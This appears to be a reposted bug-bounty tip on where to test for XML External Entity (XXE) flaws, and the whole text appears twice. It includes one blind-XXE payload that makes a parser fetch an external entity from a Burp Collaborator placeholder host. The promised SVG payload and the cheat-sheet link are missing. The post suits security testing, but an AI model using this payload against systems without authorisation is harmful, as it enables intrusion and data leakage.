I'm sharing this information with you, I found it surfing the internet and its very helpful...
XXE -> XML External Entity
+ When it comes to identifying XXE issues, you'll find these vulnerabilities almost everywhere.
Here's a list of the top 5 features and areas you should look for when testing for XXE issues:
1. XML APIs - Test the target applications and check if XML is being used or, alternatively, try replacing content-type: application/json with application/xml or text/xml with an XML body.
2. SOAP APIs - Working on a target application that supports SOAP? Try XXE payloads
3. SAML Authentication - Test XXE in the SAML stream.
4. HTML parsing (e.g. converting HTML to another file type)
5. SVG file loading - assuming the application supports SVG file loading and parses SVG. You can test this payload:
These areas often conceal potential XXE vulnerabilities waiting to be uncovered.
The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://BURP_COLLABORATOR[.]burpcollaborator[.]net/x"> %ext;
]>
Payloads and examples - XXE Injection cheat sheet at
XXE may be hiding where you least expect it - happy hunting! 😁
XXE -> XML External Entity
+ When it comes to identifying XXE issues, you'll find these vulnerabilities almost everywhere.
Here's a list of the top 5 features and areas you should look for when testing for XXE issues:
1. XML APIs - Test the target applications and check if XML is being used or, alternatively, try replacing content-type: application/json with application/xml or text/xml with an XML body.
2. SOAP APIs - Working on a target application that supports SOAP? Try XXE payloads
3. SAML Authentication - Test XXE in the SAML stream.
4. HTML parsing (e.g. converting HTML to another file type)
5. SVG file loading - assuming the application supports SVG file loading and parses SVG. You can test this payload:
These areas often conceal potential XXE vulnerabilities waiting to be uncovered.
The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://BURP_COLLABORATOR[.]burpcollaborator[.]net/x"> %ext;
]>
Payloads and examples - XXE Injection cheat sheet at
XXE may be hiding where you least expect it - happy hunting! 😁